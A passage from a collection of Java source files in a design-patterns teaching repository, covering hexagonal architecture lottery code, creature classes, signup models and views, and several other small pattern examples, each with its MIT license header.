* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.domain;
import static com.iluwatar.hexagonal.domain.LotteryConstants.SERVICE_BANK_ACCOUNT;
import static com.iluwatar.hexagonal.domain.LotteryConstants.TICKET_PRIZE;
import com.google.inject.Inject;
import com.iluwatar.hexagonal.banking.WireTransfers;
import com.iluwatar.hexagonal.database.LotteryTicketRepository;
import com.iluwatar.hexagonal.eventlog.LotteryEventLog;
import java.util.Optional;
/**
* Implementation for lottery service.
*/
public class LotteryService {
private final LotteryTicketRepository repository;
private final LotteryEventLog notifications;
private final WireTransfers wireTransfers;
/**
* Constructor.
*/
@Inject
public LotteryService(LotteryTicketRepository repository, LotteryEventLog notifications,
WireTransfers wireTransfers) {
this.repository = repository;
this.notifications = notifications;
this.wireTransfers = wireTransfers;
}
/**
* Submit lottery ticket to participate in the lottery.
*/
public Optional<LotteryTicketId> submitTicket(LotteryTicket ticket) {
var playerDetails = ticket.playerDetails();
var playerAccount = playerDetails.bankAccount();
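    //charge the ticket fee from the player's account to the lottery service account before saving the ticket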
var result = wireTransfers.transferFunds(TICKET_PRIZE, playerAccount, SERVICE_BANK_ACCOUNT);
if (!result) {
notifications.ticketSubmitError(playerDetails);
return Optional.empty();
}
var optional = repository.save(ticket);
if (optional.isPresent()) {
notifications.ticketSubmitted(playerDetails);
}
return optional;
}
/**
* Check if lottery ticket has won.
*/
public LotteryTicketCheckResult checkTicketForPrize(
LotteryTicketId id,
LotteryNumbers winningNumbers
) {
return LotteryUtils.checkTicketForPrize(repository, id, winningNumbers);
}
}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/domain/LotteryService.java |
1,071 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.sampledata;
import com.iluwatar.hexagonal.banking.InMemoryBank;
import com.iluwatar.hexagonal.domain.LotteryConstants;
import com.iluwatar.hexagonal.domain.LotteryNumbers;
import com.iluwatar.hexagonal.domain.LotteryService;
import com.iluwatar.hexagonal.domain.LotteryTicket;
import com.iluwatar.hexagonal.domain.LotteryTicketId;
import com.iluwatar.hexagonal.domain.PlayerDetails;
import java.security.SecureRandom;
import java.util.AbstractMap.SimpleEntry;
import java.util.List;
import java.util.stream.Collectors;
/**
* Utilities for creating sample lottery tickets.
*/
public class SampleData {
private static final List<PlayerDetails> PLAYERS;
private static final SecureRandom RANDOM = new SecureRandom();
static {
PLAYERS = List.of(
new PlayerDetails("[email protected]", "312-342", "+3242434242"),
new PlayerDetails("[email protected]", "234-987", "+23452346"),
new PlayerDetails("[email protected]", "833-836", "+63457543"),
new PlayerDetails("[email protected]", "319-826", "+24626"),
new PlayerDetails("[email protected]", "983-322", "+3635635"),
new PlayerDetails("[email protected]", "934-734", "+0898245"),
new PlayerDetails("[email protected]", "536-738", "+09845325"),
new PlayerDetails("[email protected]", "453-936", "+2423532"),
new PlayerDetails("[email protected]", "114-988", "+5646346524"),
new PlayerDetails("[email protected]", "663-765", "+928394235"),
new PlayerDetails("[email protected]", "334-763", "+35448"),
new PlayerDetails("[email protected]", "735-964", "+98752345"),
new PlayerDetails("[email protected]", "734-853", "+043842423"),
new PlayerDetails("[email protected]", "334-746", "+73294135"),
new PlayerDetails("[email protected]", "444-766", "+358042354"),
new PlayerDetails("[email protected]", "895-345", "+9752435"),
new PlayerDetails("[email protected]", "760-009", "+34203542"),
new PlayerDetails("[email protected]", "425-907", "+9872342"),
new PlayerDetails("[email protected]", "023-638", "+673824122"),
new PlayerDetails("[email protected]", "335-886", "+5432503945"),
new PlayerDetails("[email protected]", "225-946", "+9872341324"),
new PlayerDetails("[email protected]", "265-748", "+134124"),
new PlayerDetails("[email protected]", "190-045", "+34453452"),
new PlayerDetails("[email protected]", "241-465", "+9897641231"),
new PlayerDetails("[email protected]", "746-936", "+42345298345"),
new PlayerDetails("[email protected]", "946-384", "+79831742"),
new PlayerDetails("[email protected]", "310-992", "+0498837412"),
new PlayerDetails("[email protected]", "032-045", "+67834134"),
new PlayerDetails("[email protected]", "000-346", "+498723"),
new PlayerDetails("[email protected]", "994-989", "+987324454"),
new PlayerDetails("[email protected]", "546-634", "+987642435"),
new PlayerDetails("[email protected]", "342-874", "+7834325"),
new PlayerDetails("[email protected]", "024-653", "+980742154"),
new PlayerDetails("[email protected]", "834-935", "+876423145"),
new PlayerDetails("[email protected]", "284-936", "+09843212345"),
new PlayerDetails("[email protected]", "843-073", "+678324123"),
new PlayerDetails("[email protected]", "637-738", "+09842354"),
new PlayerDetails("[email protected]", "143-947", "+375245"),
new PlayerDetails("[email protected]", "842-404", "+131243252")
);
var wireTransfers = new InMemoryBank();
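    //give each sample player a random starting balance in the in-memory bank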
PLAYERS.stream()
.map(PlayerDetails::bankAccount)
.map(e -> new SimpleEntry<>(e, RANDOM.nextInt(LotteryConstants.PLAYER_MAX_BALANCE)))
.collect(Collectors.toMap(SimpleEntry::getKey, SimpleEntry::getValue))
.forEach(wireTransfers::setFunds);
}
/**
* Inserts lottery tickets into the database based on the sample data.
*/
public static void submitTickets(LotteryService lotteryService, int numTickets) {
for (var i = 0; i < numTickets; i++) {
var randomPlayerDetails = getRandomPlayerDetails();
var lotteryNumbers = LotteryNumbers.createRandom();
var lotteryTicketId = new LotteryTicketId();
var ticket = new LotteryTicket(lotteryTicketId, randomPlayerDetails, lotteryNumbers);
lotteryService.submitTicket(ticket);
}
}
private static PlayerDetails getRandomPlayerDetails() {
return PLAYERS.get(RANDOM.nextInt(PLAYERS.size()));
}
}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/sampledata/SampleData.java |
1,072 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.lockableobject.domain;
/** An Orc implementation of a Creature. */
public class Orc extends Creature {
/**
* A constructor that initializes the attributes of an orc.
*
* @param name as the name of the creature.
*/
public Orc(String name) {
super(name);
setType(CreatureType.ORC);
setDamage(CreatureStats.ORC_DAMAGE.getValue());
setHealth(CreatureStats.ORC_HEALTH.getValue());
}
}
| iluwatar/java-design-patterns | lockable-object/src/main/java/com/iluwatar/lockableobject/domain/Orc.java |
1,073 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.page.controller;
import lombok.Data;
import lombok.NoArgsConstructor;
/**
* User model.
*/
@Data
@NoArgsConstructor
public class UserModel {
private String name;
private String email;
} | iluwatar/java-design-patterns | page-controller/src/main/java/com/iluwatar/page/controller/UserModel.java |
1,075 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.page.controller;
import lombok.NoArgsConstructor;
import lombok.extern.slf4j.Slf4j;
/**
* Signup View.
*/
@Slf4j
@NoArgsConstructor
public class SignupView {
public String display() {
LOGGER.info("display signup front page");
return "/signup";
}
/**
* redirect to user page.
*/
public String redirect(SignupModel form) {
LOGGER.info("Redirect to user page with " + "name " + form.getName() + " email " + form.getEmail());
return "redirect:/user";
}
} | iluwatar/java-design-patterns | page-controller/src/main/java/com/iluwatar/page/controller/SignupView.java |
1,076 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.leaderfollowers;
import lombok.extern.slf4j.Slf4j;
/**
* The TaskHandler is used by the {@link Worker} to process the newly arrived task.
*/
@Slf4j
public class TaskHandler {
/**
   * This method handles one task at a time.
*/
public void handleTask(Task task) throws InterruptedException {
var time = task.getTime();
Thread.sleep(time);
LOGGER.info("It takes " + time + " milliseconds to finish the task");
task.setFinished(true);
}
}
| iluwatar/java-design-patterns | leader-followers/src/main/java/com/iluwatar/leaderfollowers/TaskHandler.java |
1,077 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.roleobject;
import static com.iluwatar.roleobject.Role.BORROWER;
import static com.iluwatar.roleobject.Role.INVESTOR;
import lombok.extern.slf4j.Slf4j;
/**
 * The Role Object pattern suggests modeling context-specific views of an object as separate role
* objects which are dynamically attached to and removed from the core object. We call the resulting
* composite object structure, consisting of the core and its role objects, a subject. A subject
* often plays several roles and the same role is likely to be played by different subjects. As an
* example consider two different customers playing the role of borrower and investor, respectively.
* Both roles could as well be played by a single {@link Customer} object. The common superclass for
* customer-specific roles is provided by {@link CustomerRole}, which also supports the {@link
* Customer} interface.
*
* <p>The {@link CustomerRole} class is abstract and not meant to be instantiated.
* Concrete subclasses of {@link CustomerRole}, for example {@link BorrowerRole} or {@link
* InvestorRole}, define and implement the interface for specific roles. It is only these subclasses
* which are instantiated at runtime. The {@link BorrowerRole} class defines the context-specific
* view of {@link Customer} objects as needed by the loan department. It defines additional
* operations to manage the customer’s credits and securities. Similarly, the {@link InvestorRole}
* class adds operations specific to the investment department’s view of customers. A client like
* the loan application may either work with objects of the {@link CustomerRole} class, using the
* interface class {@link Customer}, or with objects of concrete {@link CustomerRole} subclasses.
* Suppose the loan application knows a particular {@link Customer} instance through its {@link
* Customer} interface. The loan application may want to check whether the {@link Customer} object
* plays the role of Borrower. To this end it calls {@link Customer#hasRole(Role)} with a suitable
* role specification. For the purpose of our example, let’s assume we can name roles with enum. If
* the {@link Customer} object can play the role named “Borrower,” the loan application will ask it
* to return a reference to the corresponding object. The loan application may now use this
* reference to call Borrower-specific operations.
*/
@Slf4j
public class ApplicationRoleObject {
/**
* Main entry point.
*
* @param args program arguments
*/
public static void main(String[] args) {
var customer = Customer.newCustomer(BORROWER, INVESTOR);
LOGGER.info(" the new customer created : {}", customer);
var hasBorrowerRole = customer.hasRole(BORROWER);
LOGGER.info(" customer has a borrowed role - {}", hasBorrowerRole);
var hasInvestorRole = customer.hasRole(INVESTOR);
LOGGER.info(" customer has an investor role - {}", hasInvestorRole);
customer.getRole(INVESTOR, InvestorRole.class)
.ifPresent(inv -> {
inv.setAmountToInvest(1000);
inv.setName("Billy");
});
customer.getRole(BORROWER, BorrowerRole.class)
.ifPresent(inv -> inv.setName("Johny"));
customer.getRole(INVESTOR, InvestorRole.class)
.map(InvestorRole::invest)
.ifPresent(LOGGER::info);
customer.getRole(BORROWER, BorrowerRole.class)
.map(BorrowerRole::borrow)
.ifPresent(LOGGER::info);
}
} | iluwatar/java-design-patterns | role-object/src/main/java/com/iluwatar/roleobject/ApplicationRoleObject.java |
1,078 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.identitymap;
/**
 * Runtime exception used to control the flow when a person id does not exist.
*/
public class IdNotFoundException extends RuntimeException {
public IdNotFoundException(final String message) {
super(message);
}
}
| iluwatar/java-design-patterns | identity-map/src/main/java/com/iluwatar/identitymap/IdNotFoundException.java |
1,079 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.doubledispatch;
import lombok.Getter;
import lombok.Setter;
/**
* Game objects have coordinates and some other status information.
*/
@Getter
@Setter
public abstract class GameObject extends Rectangle {
private boolean damaged;
private boolean onFire;
public GameObject(int left, int top, int right, int bottom) {
super(left, top, right, bottom);
}
@Override
public String toString() {
return String.format("%s at %s damaged=%b onFire=%b", this.getClass().getSimpleName(),
super.toString(), isDamaged(), isOnFire());
}
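  //double dispatch: collision() dispatches on this object's runtime type, collisionResolve() on the other object's runtime type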
public abstract void collision(GameObject gameObject);
public abstract void collisionResolve(FlamingAsteroid asteroid);
public abstract void collisionResolve(Meteoroid meteoroid);
public abstract void collisionResolve(SpaceStationMir mir);
public abstract void collisionResolve(SpaceStationIss iss);
}
| iluwatar/java-design-patterns | double-dispatch/src/main/java/com/iluwatar/doubledispatch/GameObject.java |
1,081 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.parameter.object;
import lombok.Getter;
/**
* enum for sort order types.
*/
public enum SortOrder {
ASC("asc"),
DESC("desc");
@Getter
  private final String value;
SortOrder(String value) {
this.value = value;
}
}
| iluwatar/java-design-patterns | parameter-object/src/main/java/com/iluwatar/parameter/object/SortOrder.java |
1,082 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.page.controller;
import lombok.Data;
import lombok.NoArgsConstructor;
import org.springframework.stereotype.Component;
/**
 * Signup model.
*/
@Component
@Data
@NoArgsConstructor
public class SignupModel {
private String name;
private String email;
private String password;
} | iluwatar/java-design-patterns | page-controller/src/main/java/com/iluwatar/page/controller/SignupModel.java |
1,083 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.virtual.proxy;
import lombok.Getter;
import lombok.extern.slf4j.Slf4j;
/**
* Represents a real video object that is expensive to create and manage.
*/
@Slf4j
@Getter
public class RealVideoObject implements ExpensiveObject {
public RealVideoObject() {
heavyInitialConfiguration();
}
private void heavyInitialConfiguration() {
LOGGER.info("Loading initial video configurations...");
}
@Override
public void process() {
LOGGER.info("Processing and playing video content...");
}
} | iluwatar/java-design-patterns | virtual-proxy/src/main/java/com/iluwatar/virtual/proxy/RealVideoObject.java |
1,084 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.eventlog;
import com.iluwatar.hexagonal.domain.PlayerDetails;
import lombok.extern.slf4j.Slf4j;
/**
* Standard output event log.
*/
@Slf4j
public class StdOutEventLog implements LotteryEventLog {
@Override
public void ticketSubmitted(PlayerDetails details) {
LOGGER.info("Lottery ticket for {} was submitted. Bank account {} was charged for 3 credits.",
details.email(), details.bankAccount());
}
@Override
public void ticketDidNotWin(PlayerDetails details) {
LOGGER.info("Lottery ticket for {} was checked and unfortunately did not win this time.",
details.email());
}
@Override
public void ticketWon(PlayerDetails details, int prizeAmount) {
LOGGER.info("Lottery ticket for {} has won! The bank account {} was deposited with {} credits.",
details.email(), details.bankAccount(), prizeAmount);
}
@Override
public void prizeError(PlayerDetails details, int prizeAmount) {
LOGGER.error("Lottery ticket for {} has won! Unfortunately the bank credit transfer of"
+ " {} failed.", details.email(), prizeAmount);
}
@Override
public void ticketSubmitError(PlayerDetails details) {
LOGGER.error("Lottery ticket for {} could not be submitted because the credit transfer"
+ " of 3 credits failed.", details.email());
}
}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/eventlog/StdOutEventLog.java |
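A hedged usage sketch for the event log port above, placed in the same package as StdOutEventLog. PlayerDetails is only visible here through its email() and bankAccount() accessors, so the three-argument constructor used below is an assumption.
import com.iluwatar.hexagonal.domain.PlayerDetails;

public class EventLogDemo {
  public static void main(String[] args) {
    LotteryEventLog eventLog = new StdOutEventLog();
    // assumed constructor order: (email, bank account, phone number)
    PlayerDetails player = new PlayerDetails("john@example.com", "111-222", "+123456");
    eventLog.ticketSubmitted(player);
    eventLog.ticketWon(player, 1000);
  }
}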
1,085 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.lockableobject.domain;
/** A human implementation of a Creature. */
public class Human extends Creature {
/**
* A constructor that initializes the attributes of a human.
*
* @param name as the name of the creature.
*/
public Human(String name) {
super(name);
setType(CreatureType.HUMAN);
